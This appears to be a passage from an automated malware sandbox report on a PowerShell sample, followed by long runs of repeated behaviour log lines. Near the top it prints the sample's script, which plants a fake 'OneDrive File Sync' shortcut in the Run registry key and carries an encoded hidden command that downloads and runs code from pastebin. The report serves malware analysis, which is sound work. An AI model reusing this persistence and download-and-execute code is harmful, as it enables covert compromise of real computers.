Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
